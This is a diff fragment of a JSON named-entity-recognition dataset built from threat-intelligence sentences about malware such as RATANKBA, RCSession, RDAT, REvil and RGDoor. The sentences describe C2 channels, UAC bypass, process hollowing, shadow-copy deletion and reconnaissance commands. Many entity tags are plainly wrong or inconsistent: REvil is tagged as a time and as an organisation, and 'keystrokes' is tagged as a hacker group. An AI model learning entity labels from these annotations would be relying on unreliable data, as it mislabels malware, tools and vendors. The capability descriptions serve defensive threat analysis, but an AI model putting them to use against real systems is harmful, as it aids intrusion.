+ "it", + "directly", + "into", + "memory." + ], + "ner_tags": [ + "B-Way", + "I-Features", + "I-Features", + "O", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RARSTONE", + "uses", + "SSL", + "to", + "encrypt", + "its", + "communication", + "with", + "its", + "C2", + "server." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RATANKBA", + "performs", + "a", + "reflective", + "DLL", + "injection", + "using", + "a", + "given", + "pid." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RATANKBA", + "uploads", + "and", + "downloads", + "information." + ], + "ner_tags": [ + "B-Way", + "B-Features", + "O", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "RATANKBA", + "uses", + "the", + "<code>net", + "user</code>", + "command." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "There", + "is", + "a", + "variant", + "of", + "RATANKBA", + "that", + "uses", + "a", + "PowerShell", + "script", + "instead", + "of", + "the", + "traditional", + "PE", + "form." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RATANKBA", + "lists", + "the", + "system’s", + "processes." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RATANKBA", + "uses", + "the", + "command", + "<code>reg", + "query", + "“HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\InternetSettings”</code>." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RATANKBA", + "runs", + "the", + "<code>net", + "view", + "/domain</code>", + "and", + "<code>net", + "view</code>", + "commands." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RATANKBA", + "gathers", + "information", + "about", + "the", + "OS", + "architecture,", + "OS", + "name,", + "and", + "OS", + "version/Service", + "pack." + ], + "ner_tags": [ + "B-Way", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RATANKBA", + "gathers", + "the", + "victim’s", + "IP", + "address", + "via", + "the", + "<code>ipconfig", + "-all</code>", + "command." + ], + "ner_tags": [ + "B-Way", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RATANKBA", + "uses", + "<code>netstat", + "-ano</code>", + "to", + "search", + "for", + "specific", + "IP", + "address", + "ranges." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "RATANKBA", + "runs", + "the", + "<code>whoami</code>", + "and", + "<code>query", + "user</code>", + "commands." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RATANKBA", + "uses", + "<code>tasklist", + "/svc</code>", + "to", + "display", + "running", + "tasks." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RATANKBA", + "uses", + "HTTP/HTTPS", + "for", + "command", + "and", + "control", + "communication." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RATANKBA", + "uses", + "cmd.exe", + "to", + "execute", + "commands." + ], + "ner_tags": [ + "B-Way", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RATANKBA", + "uses", + "WMI", + "to", + "perform", + "process", + "monitoring." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RCSession", + "can", + "bypass", + "UAC", + "to", + "escalate", + "privileges." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RCSession", + "can", + "be", + "installed", + "via", + "DLL", + "side-loading." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "RCSession", + "can", + "collect", + "data", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RCSession", + "can", + "use", + "an", + "encrypted", + "beacon", + "to", + "check", + "in", + "with", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RCSession", + "can", + "compress", + "and", + "obfuscate", + "its", + "strings", + "to", + "evade", + "detection", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RCSession", + "can", + "remove", + "files", + "from", + "a", + "targeted", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RCSession", + "can", + "store", + "its", + "obfuscated", + "configuration", + "file", + "in", + "the", + "Registry", + "under", + "`HKLM\\SOFTWARE\\Plus`", + "or", + "`HKCU\\SOFTWARE\\Plus`." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "RCSession", + "has", + "the", + "ability", + "to", + "drop", + "additional", + "files", + "to", + "an", + "infected", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RCSession", + "has", + "the", + "ability", + "to", + "capture", + "keystrokes", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RCSession", + "has", + "used", + "a", + "file", + "named", + "English.rtf", + "to", + "appear", + "benign", + "on", + "victim", + "hosts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RCSession", + "can", + "write", + "its", + "configuration", + "file", + "to", + "the", + "Registry." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RCSession", + "has", + "the", + "ability", + "to", + "execute", + "inside", + "the", + "msiexec.exe", + "process." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "RCSession", + "can", + "use", + "WinSock", + "API", + "for", + "communication", + "including", + "<code>WSASend</code>", + "and", + "<code>WSARecv</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "RCSession", + "has", + "the", + "ability", + "to", + "use", + "TCP", + "and", + "UDP", + "in", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RCSession", + "can", + "identify", + "processes", + "based", + "on", + "PID." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RCSession", + "can", + "launch", + "itself", + "from", + "a", + "hollowed", + "svchost.exe", + "process." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "RCSession", + "has", + "the", + "ability", + "to", + "modify", + "a", + "Registry", + "Run", + "key", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RCSession", + "can", + "capture", + "screenshots", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RCSession", + "can", + "gather", + "system", + "information", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RCSession", + "can", + "gather", + "system", + "owner", + "information,", + "including", + "user", + "and", + "administrator", + "privileges." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RCSession", + "can", + "use", + "HTTP", + "in", + "C2", + "communications." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RCSession", + "can", + "use", + "`cmd.exe`", + "for", + "execution", + "on", + "compromised", + "hosts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RDAT", + "has", + "used", + "DNS", + "to", + "communicate", + "with", + "the", + "C2." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "B-Features", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "RDAT", + "has", + "used", + "encoded", + "data", + "within", + "subdomains", + "as", + "AES", + "ciphertext", + "to", + "communicate", + "from", + "the", + "host", + "to", + "the", + "C2." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RDAT", + "can", + "upload", + "a", + "file", + "via", + "HTTP", + "POST", + "response", + "to", + "the", + "C2", + "split", + "into", + "102,400-byte", + "portions.", + "RDAT", + "can", + "also", + "download", + "data", + "from", + "the", + "C2", + "which", + "is", + "split", + "into", + "81,920-byte", + "portions." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RDAT", + "can", + "deobfuscate", + "the", + "base64-encoded", + "and", + "AES-encrypted", + "files", + "downloaded", + "from", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RDAT", + "can", + "exfiltrate", + "data", + "gathered", + "from", + "the", + "infected", + "system", + "via", + "the", + "established", + "Exchange", + "Web", + "Services", + "API", + "C2", + "channel." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RDAT", + "has", + "used", + "HTTP", + "if", + "DNS", + "C2", + "communications", + "were", + "not", + "functioning." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RDAT", + "can", + "issue", + "SOAP", + "requests", + "to", + "delete", + "already", + "processed", + "C2", + "emails.", + "RDAT", + "can", + "also", + "delete", + "itself", + "from", + "the", + "infected", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RDAT", + "can", + "download", + "files", + "via", + "DNS." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "RDAT", + "can", + "use", + "email", + "attachments", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "I-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RDAT", + "has", + "used", + "Windows", + "Video", + "Service", + "as", + "a", + "name", + "for", + "malicious", + "services." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RDAT", + "has", + "masqueraded", + "as", + "VMware.exe." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "RDAT", + "can", + "communicate", + "with", + "the", + "C2", + "via", + "subdomains", + "that", + "utilize", + "base64", + "with", + "character", + "substitutions." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RDAT", + "can", + "take", + "a", + "screenshot", + "on", + "the", + "infected", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RDAT", + "can", + "communicate", + "with", + "the", + "C2", + "via", + "base32-encoded", + "subdomains." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RDAT", + "can", + "also", + "embed", + "data", + "within", + "a", + "BMP", + "image", + "prior", + "to", + "exfiltration." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RDAT", + "can", + "process", + "steganographic", + "images", + "attached", + "to", + "email", + "messages", + "to", + "send", + "and", + "receive", + "C2", + "commands.", + "RDAT", + "can", + "also", + "embed", + "additional", + "messages", + "within", + "BMP", + "images", + "to", + "communicate", + "with", + "the", + "RDAT", + "operator." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "O", + "O", + "B-SamFile", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "RDAT", + "has", + "used", + "AES", + "ciphertext", + "to", + "encode", + "C2", + "communications." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RDAT", + "can", + "use", + "HTTP", + "communications", + "for", + "C2,", + "as", + "well", + "as", + "using", + "the", + "WinHTTP", + "library", + "to", + "make", + "requests", + "to", + "the", + "Exchange", + "Web", + "Services", + "API." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RDAT", + "has", + "executed", + "commands", + "using", + "<code>cmd.exe", + "/c</code>." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "RDAT", + "has", + "created", + "a", + "service", + "when", + "it", + "is", + "installed", + "on", + "the", + "victim", + "machine." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RDFSNIFFER", + "hooks", + "several", + "Win32", + "API", + "functions", + "to", + "hijack", + "elements", + "of", + "the", + "remote", + "system", + "management", + "user-interface." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RDFSNIFFER", + "has", + "the", + "capability", + "of", + "deleting", + "local", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "RDFSNIFFER", + "has", + "used", + "several", + "Win32", + "API", + "functions", + "to", + "interact", + "with", + "the", + "victim", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "REvil", + "has", + "encrypted", + "C2", + "communications", + "with", + "the", + "ECIES", + "algorithm." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "REvil", + "can", + "launch", + "an", + "instance", + "of", + "itself", + "with", + "administrative", + "rights", + "using", + "runas." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "REvil", + "has", + "the", + "capability", + "to", + "destroy", + "files", + "and", + "folders." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "REvil", + "can", + "encrypt", + "files", + "on", + "victim", + "systems", + "and", + "demands", + "a", + "ransom", + "to", + "decrypt", + "the", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "REvil", + "can", + "decode", + "encrypted", + "strings", + "to", + "enable", + "execution", + "of", + "commands", + "and", + "payloads." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "B-HackOrg" + ] + }, + { + "tokens": [ + "REvil", + "can", + "connect", + "to", + "and", + "disable", + "the", + "Symantec", + "server", + "on", + "the", + "victim's", + "network." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Time", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "REvil", + "can", + "identify", + "the", + "domain", + "membership", + "of", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "REvil", + "has", + "infected", + "victim", + "machines", + "through", + "compromised", + "websites", + "and", + "exploit", + "kits." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "REvil", + "has", + "used", + "encrypted", + "strings", + "and", + "configuration", + "files." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Tool", + "O", + "O", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "REvil", + "can", + "exfiltrate", + "host", + "and", + "malware", + "information", + "to", + "C2", + "servers." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "REvil", + "can", + "mark", + "its", + "binary", + "code", + "for", + "deletion", + "after", + "reboot." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "REvil", + "has", + "the", + "ability", + "to", + "identify", + "specific", + "files", + "and", + "directories", + "that", + "are", + "not", + "to", + "be", + "encrypted." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "REvil", + "can", + "save", + "encryption", + "parameters", + "and", + "system", + "information", + "in", + "the", + "Registry." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "REvil", + "can", + "download", + "a", + "copy", + "of", + "itself", + "from", + "an", + "attacker", + "controlled", + "IP", + "address", + "to", + "the", + "victim", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "REvil", + "can", + "use", + "vssadmin", + "to", + "delete", + "volume", + "shadow", + "copies", + "and", + "bcdedit", + "to", + "disable", + "recovery", + "features." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "REvil", + "has", + "been", + "executed", + "via", + "malicious", + "MS", + "Word", + "e-mail", + "attachments." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-SamFile", + "B-Way", + "B-Way" + ] + }, + { + "tokens": [ + "REvil", + "can", + "mimic", + "the", + "names", + "of", + "known", + "executables." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "REvil", + "can", + "modify", + "the", + "Registry", + "to", + "save", + "encryption", + "parameters", + "and", + "system", + "information." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "REvil", + "can", + "use", + "Native", + "API", + "for", + "execution", + "and", + "to", + "retrieve", + "active", + "services." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "REvil", + "has", + "used", + "PowerShell", + "to", + "delete", + "volume", + "shadow", + "copies", + "and", + "download", + "files." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "REvil", + "can", + "inject", + "itself", + "into", + "running", + "processes", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "REvil", + "can", + "query", + "the", + "Registry", + "to", + "get", + "random", + "file", + "extensions", + "to", + "append", + "to", + "encrypted", + "files." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "REvil", + "can", + "force", + "a", + "reboot", + "in", + "safe", + "mode", + "with", + "networking." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "REvil", + "has", + "the", + "capability", + "to", + "stop", + "services", + "and", + "kill", + "processes." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "REvil", + "has", + "been", + "distributed", + "via", + "malicious", + "e-mail", + "attachments", + "including", + "MS", + "Word", + "Documents." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "I-SamFile", + "B-SecTeam" + ] + }, + { + "tokens": [ + "REvil", + "can", + "identify", + "the", + "username,", + "machine", + "name,", + "system", + "language,", + "keyboard", + "layout,", + "OS", + "version,", + "and", + "system", + "drive", + "information", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "REvil", + "can", + "check", + "the", + "system", + "language", + "using", + "<code>GetUserDefaultUILanguage</code>", + "and", + "<code>GetSystemDefaultUILanguage</code>.", + "If", + "the", + "language", + "is", + "found", + "in", + "the", + "list,", + "the", + "process", + "terminates." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "REvil", + "can", + "enumerate", + "active", + "services." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "I-Idus", + "O" + ] + }, + { + "tokens": [ + "REvil", + "can", + "obtain", + "the", + "token", + "from", + "the", + "user", + "that", + "launched", + "the", + "explorer.exe", + "process", + "to", + "avoid", + "affecting", + "the", + "desktop", + "of", + "the", + "SYSTEM", + "user." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Org" + ] + }, + { + "tokens": [ + "REvil", + "has", + "used", + "obfuscated", + "VBA", + "macros", + "for", + "execution." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "REvil", + "has", + "used", + "HTTP", + "and", + "HTTPS", + "in", + "communication", + "with", + "C2." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "REvil", + "can", + "use", + "the", + "Windows", + "command", + "line", + "to", + "delete", + "volume", + "shadow", + "copies", + "and", + "disable", + "recovery." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "REvil", + "can", + "use", + "WMI", + "to", + "monitor", + "for", + "and", + "kill", + "specific", + "processes", + "listed", + "in", + "its", + "configuration", + "file." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RGDoor", + "encrypts", + "files", + "with", + "XOR", + "before", + "sending", + "them", + "back", + "to", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-Way", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RGDoor", + "decodes", + "Base64", + "strings", + "and", + "decrypts", + "strings", + "using", + "a", + "custom", + "XOR", + "algorithm." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-HackOrg", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "RGDoor", + "establishes", + "persistence", + "on", + "webservers", + "as", + "an", + "IIS", + "module." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RGDoor", + "uploads", + "and", + "downloads", + "files", + "to", + "and", + "from", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RGDoor", + "executes", + "the", + "<code>whoami</code>", + "on", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RGDoor", + "uses", + "HTTP", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RGDoor", + "uses", + "cmd.exe", + "to", + "execute", + "commands", + "on", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT12", + "has", + "used", + "the", + "RIPTIDE", + "RAT,", + "which", + "communicates", + "over", + "HTTP", + "with", + "a", + "payload", + "encrypted", + "with", + "RC4." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT12", + "has", + "used", + "RIPTIDE,", + "a", + "RAT", + "that", + "uses", + "HTTP", + "to", + "communicate." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + 